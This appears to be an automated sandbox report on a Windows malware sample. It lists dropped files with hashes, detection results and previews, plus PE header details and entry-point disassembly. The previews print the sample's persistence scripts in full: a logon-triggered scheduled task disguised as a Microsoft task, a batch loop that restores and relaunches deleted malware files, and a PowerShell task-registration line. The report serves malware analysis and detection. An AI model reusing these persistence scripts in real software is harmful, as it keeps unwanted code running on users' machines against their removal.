                                                                                              Process:C:\Users\user\Desktop\Uulw5M1DfU.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):63227696
                                                                                              Entropy (8bit):7.999995315458035
                                                                                              Encrypted:true
                                                                                              SSDEEP:1572864:sWhwN07asv+9VzfaL+s0ige/3Il9WLbtuMrOH0gJ9A:sS007as2bzfaLBV/gmLbZCUgLA
                                                                                              MD5:B4FB932CDAAA009DFCE48C94D514DC20
                                                                                              SHA1:24B87000FCF2E059DCEAA348CCE265F5F1C5FD3F
                                                                                              SHA-256:54064B151392FF87F7776AB8EE9807030FEAF87566DDC6251E7F66CF0D7ADEB6
                                                                                              SHA-512:7612E474FAF8FFF74DC12870BCAE09FCF9AD5CCFE49559239517367598EA240403710DBFE58E3496D4411F2147866C7754DB15D73848973465370107CD828141
                                                                                              Malicious:false
                                                                                              Preview:..>..9..x...@...~G.d.....j;%l.....;..w-.HD.!.O..}..6rTX.g..P[3.F...j.nH..U>..d]. ...6..D4.F.r*.C_..0....u.....*J^'V.b......!q..]j....e8S..........0R=[.j.\..D...........k.Nq..y.S.1.....]N.?.b...$..4.jv..t!3I......U.K.....?.@.=..|.*..=L.z.A3...m..'D........g.I.......O.,q.....%.$......Y.....lw479.PRK.VN..>..}.X.*......s..'...h.d.\HS.'e......g.t.........7k.]9..q..Y5.........~~...@\....."L..u.IQ.4M...?..b.I.0w...:...i]..&.q.s[...c.A...`.]5.p..D...!.q........:....4M...W#RM...........2......)h..@..q....D*6sA4.`..aj...M.om........IT"5.j..[.*..Bs...L...`.}..r..%..B...qb.J.vQ...g......2Xf.v.,.uK.5...k....K..rh....,.}.B...O...^$..Dtsw..g...F.m.....n.[|.vp0...........}..4w....9.r.WX.Mu2.G.=j.%......P...Lsdy.*...w..e....2..i.....q\m..M.a.V..8CP5.....L'.'..=..../*.?...B+..."X'm9 ...*.....n.!......o)J.q...YQ.liEL..F.[..W.i.....w...>....-....r..R........\.S......{c....%..P74....z...S..N......)A..t...Z.)....a...+[.x.....R..+$.f.6..u**.......Y./.r*:.S..
                                                                                              Process:C:\Users\user\Desktop\Uulw5M1DfU.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):4540512
                                                                                              Entropy (8bit):7.278249613007746
                                                                                              Encrypted:false
                                                                                              SSDEEP:98304:vevwfTovd3ZIdCCFQfUfQ8aA78VREwBwMu:meol3ZIdCxujaAqRgMu
                                                                                              MD5:EC1580551A183D46B8BE885B7519F1D5
                                                                                              SHA1:4D5B0038633B92A11C3AAFD33DAAFF54D354FD91
                                                                                              SHA-256:D0B485BCBD919FA05653281A9F1AB5B574D19A47AACBFAD89D411B946763FA1A
                                                                                              SHA-512:759C4266DFA1168C6E91791AF71B946F3EE0E217B3CFFDD670BD6E7A811CBB2BECA0F5D9CE7ED06A40BE75C9FE735BBDD767E8A5F1AC6F61F61DB7FA47532D05
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........r.................E1............n........J............n.....n............n....n.......n.......n...................n.....Rich...........PE..L....:eg.................."..D#...............#...@..........................pF.......E...@..................................K*.|....p,..............D.`R... E..D....#.8............................7).@.............#..............................text...V."......."................. ..`.rdata...d....#..f....#.............@..@.data.........*......h*.............@....rsrc.......p,.......+.............@..@.reloc...D... E..F....C.............@..B........................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):1360
                                                                                              Entropy (8bit):5.410330802539769
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:3gOWSKco4KmZjKbmOIKod6emN1s4RPQoU99tXt/NK3R88bJ02iaEW3b5:QOWSU4xympjms4RIoU99tlNWR832qab5
                                                                                              MD5:86573B2CBAF1D263D00F31AFBBC1656E
                                                                                              SHA1:4B5A1635AEAF826CFAE1E5EFACD3238BC29CEE8E
                                                                                              SHA-256:2056A4F86A03C85E1A32CA1EA013B07BB9BA809DA46C2BA56A2F62FB7117BA94
                                                                                              SHA-512:C33F152CDB4EEF1263D9AA9064AA192E14CD72D9C879D6733DBBB3DF9333FF8B6945BDEB20AD8293CD6416C2933E71F94D8062E44B8521AB336E770C768F0886
                                                                                              Malicious:false
                                                                                              Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                                              Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):1893
                                                                                              Entropy (8bit):5.212287775015203
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                              MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                              SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                              SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                              SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):340760
                                                                                              Entropy (8bit):6.543019915715004
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/jUaCcM:H66LUtNrIAzCKzRgDKrSeoUalM
                                                                                              MD5:D8B8211D3CF9185D5C882AEF534CFA79
                                                                                              SHA1:157FDE2C93A2A96726C49755C787E805EDE6E980
                                                                                              SHA-256:A250C7CF1645BB2672DE489C1E1164EE0230703A6AC8E8AB8DE6D42E9EAC476C
                                                                                              SHA-512:440E656B42997359CC32647564927AD8D0A65383E7340A7871B62FD87112A3A79C38D4409FA7DEB94C33B297895E522C1ACC9E8AAF7BCE96296CF99EA6F9EDAB
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....mg...........!.........L......Y........................................p............@..........................t..O....t..........p6...............)...@...&...r.......................4.......................w...............................text............................... ..`.rdata..............................@..@.data....!..........................@....00cfg..............................@..@.tls................................@....rsrc...p6.......8..................@..@.reloc...&...@...(..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):395368
                                                                                              Entropy (8bit):5.090673225697451
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                                                                              MD5:FB325C945A08D06FE91681179BDCCC66
                                                                                              SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                                                                              SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                                                                              SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):769
                                                                                              Entropy (8bit):5.113976261619789
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:NFW/WAW/WAWE3fzWcWrfZKx31SIYaYZLZ6y:NFVAVAjvz6ZKx31SIYN/6y
                                                                                              MD5:F7F23953F7C236A0F12AE4848F174480
                                                                                              SHA1:E222C191BE437B39FB294EDD1FCCAF961B1F7265
                                                                                              SHA-256:0CD1B31F9AA2F089BD33331B172CD4813167BD59F889EFDC7EB2ADAA71F3D9CC
                                                                                              SHA-512:2790AFD071756E25FF408426E0D40879603EBCBC23C1D98AD891017237A2930F27CC19F28C38C5BAB5221E828B0B08727EDCEC1D2AA528FCCED0B7EE576836B8
                                                                                              Malicious:false
                                                                                              Preview:@echo off..:CheckProcess..set "ProcessName=Update.exe"..set "ProcessPath=C:\Users\Public\Bilite\Axialis\Update.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bilite\Axialis\Update.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..
                                                                                              Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4
                                                                                              Entropy (8bit):1.5
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:N7n:Bn
                                                                                              MD5:DF0AAB058CE179E4F7AB135ED4E641A9
                                                                                              SHA1:3C457CE18C2E37A4437E0201076AD638367EF0EA
                                                                                              SHA-256:542CACAE1D41132AC9E10320DC19210336F60EE3B2D5BB64838EFF7556132823
                                                                                              SHA-512:D96D0F8A58814D18C6D3530474F93798132C5B46E84BF72029933F74D9DEB2CE81E1F01156422E65034DBB55652FB6A6D06A33FA6B814696C816CD820675E130
                                                                                              Malicious:false
                                                                                              Preview:1148
                                                                                              Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              File Type:ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):151
                                                                                              Entropy (8bit):4.741657013789009
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                              MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                              SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                              SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                              SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                              Malicious:true
                                                                                              Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                              Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Jan 4 12:47:37 2025, mtime=Sat Jan 4 12:47:37 2025, atime=Tue Dec 24 02:25:35 2024, length=4540512, window=hide
                                                                                              Category:dropped
                                                                                              Size (bytes):1101
                                                                                              Entropy (8bit):4.711710491062973
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:8y3FNY0UlGIOTCICHqXzRF9XI8lCACmq6BTvsCJJPD6g9fojAs2cTzGT9fBav0hq:8JtGtjju8lzlvn5rfsAsjWfovuTqyFm
                                                                                              MD5:BD8562D68EFD41706AA308059F3FE965
                                                                                              SHA1:573EDB8BC36DDC287712EA65F1490B1BDA0D373B
                                                                                              SHA-256:6A99686DA48FC1B5C07575E45DC4BEDEE45FBA2FCA704A57F4F0E9413863596A
                                                                                              SHA-512:134984088C38974E8191666D9F69941DB65004E62F9949E1D4DAA5E3D21718241447A325C97FD038DF0CAB51BA73FF93F7AA83F979FD9DB6681A742FDD37ADD6
                                                                                              Malicious:false
                                                                                              Preview:L..................F.... ......6.^...I.6.^....~.U..`HE..........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH$Z.m....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....$Z.m..Public..f......O.I$Z.m....+...............<......(,.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1.....$Z.m..Bilite..>......$Z.m$Z.m...........................$..B.i.l.i.t.e.....~.2.`HE..Y2. .LDPLAY~1.EXE..b......$Z.m$Z.m............................c.l.d.p.l.a.y.e.r.9._.l.d._.6.0.0.0._.l.d...e.x.e.......^...............-.......].............L......C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe..,.....\.....\.P.u.b.l.i.c.\.B.i.l.i.t.e.\.l.d.p.l.a.y.e.r.9._.l.d._.6.0.0.0._.l.d...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......305090...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.
                                                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                              Category:dropped
                                                                                              Size (bytes):110
                                                                                              Entropy (8bit):4.292361616376963
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnn:hYFRamFSQZ0lv5y/9JctESnn
                                                                                              MD5:7689D6E1AC4668D07ACB657413767158
                                                                                              SHA1:860195BB8E4C696138711AEE8EBCB62D502E3D45
                                                                                              SHA-256:1FCD0C76A32240DE46DEEB703A1A915A00C101DA60815B2C6845316FE7E18267
                                                                                              SHA-512:63D316D45C0CBCEE68808819C984AEAA4D13C4B5FC03A54D88F7A5297D88C9041FFEFD7232A3DA9F5DEC8097E5B62B9035D3BAE9B98BD70663AFF1D1CBF21A9B
                                                                                              Malicious:false
                                                                                              Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.999857872985788
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:Uulw5M1DfU.exe
                                                                                              File size:67'003'808 bytes
                                                                                              MD5:f889fe126788ffbafc2e0cd5e233fee9
                                                                                              SHA1:30e1effa7018af4275713a9bb4e653455d31f93f
                                                                                              SHA256:0dbb48aad54c1f2361dbc58d9f22748df9156d8709554ad20f843811657c26d4
                                                                                              SHA512:106dbaef01209fe852ccfd42161dc02ab5f430044887de097da05dba8dff93641fd1e479f88d4b849d47e529eb7a189e59dfdfea586e40583a75c320e3352275
                                                                                              SSDEEP:1572864:/JuV0U0BEONYYPPm5FYyrHK+UEEHcum2gct79Sdye:BuV0U02Op29qbH/Xlt7Mdv
                                                                                              TLSH:6BE7338A378CB279C51242BFE0D03BE70BF5DB9A75142E39616D1A844ED6453E78F0CA
                                                                                              File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................@...............................................P.......................<...).
                                                                                              Icon Hash:01e0f2ccd4d4c400
                                                                                              Entrypoint:0x411def
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:b5a014d7eeb4c2042897567e1288a095
                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                              Error Number:-2146869232
                                                                                              Not Before, Not After
                                                                                              • 18/07/2022 01:00:00 18/07/2024 00:59:59
                                                                                              Subject Chain
                                                                                              • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                                                                              Version:3
                                                                                              Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                                                                              Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                                                                              Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                                                                              Serial:7098774ED29B0565AB114EF2F2871CF7
                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push FFFFFFFFh
                                                                                              push 00414C50h
                                                                                              push 00411F80h
                                                                                              mov eax, dword ptr fs:[00000000h]
                                                                                              push eax
                                                                                              mov dword ptr fs:[00000000h], esp
                                                                                              sub esp, 68h
                                                                                              push ebx
                                                                                              push esi
                                                                                              push edi
                                                                                              mov dword ptr [ebp-18h], esp
                                                                                              xor ebx, ebx
                                                                                              mov dword ptr [ebp-04h], ebx
                                                                                              push 00000002h
                                                                                              call dword ptr [00413184h]
                                                                                              pop ecx
                                                                                              or dword ptr [00419924h], FFFFFFFFh
                                                                                              or dword ptr [00419928h], FFFFFFFFh
                                                                                              call dword ptr [00413188h]
                                                                                              mov ecx, dword ptr [0041791Ch]
                                                                                              mov dword ptr [eax], ecx
                                                                                              call dword ptr [0041318Ch]
                                                                                              mov ecx, dword ptr [00417918h]
                                                                                              mov dword ptr [eax], ecx
                                                                                              mov eax, dword ptr [00413190h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov dword ptr [00419920h], eax
                                                                                              call 00007F2368B5A702h
                                                                                              cmp dword ptr [00417710h], ebx
                                                                                              jne 00007F2368B5A5EEh
                                                                                              push 00411F78h
                                                                                              call dword ptr [00413194h]
                                                                                              pop ecx
                                                                                              call 00007F2368B5A6D4h
                                                                                              push 00417048h
                                                                                              push 00417044h
                                                                                              call 00007F2368B5A6BFh
                                                                                              mov eax, dword ptr [00417914h]
                                                                                              mov dword ptr [ebp-6Ch], eax
                                                                                              lea eax, dword ptr [ebp-6Ch]
                                                                                              push eax
                                                                                              push dword ptr [00417910h]
                                                                                              lea eax, dword ptr [ebp-64h]
                                                                                              push eax
                                                                                              lea eax, dword ptr [ebp-70h]
                                                                                              push eax
                                                                                              lea eax, dword ptr [ebp-60h]
                                                                                              push eax
                                                                                              call dword ptr [0041319Ch]
                                                                                              push 00417040h
                                                                                              push 00417000h
                                                                                              call 00007F2368B5A68Ch
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x190d7.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x3fe3c880x2918
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
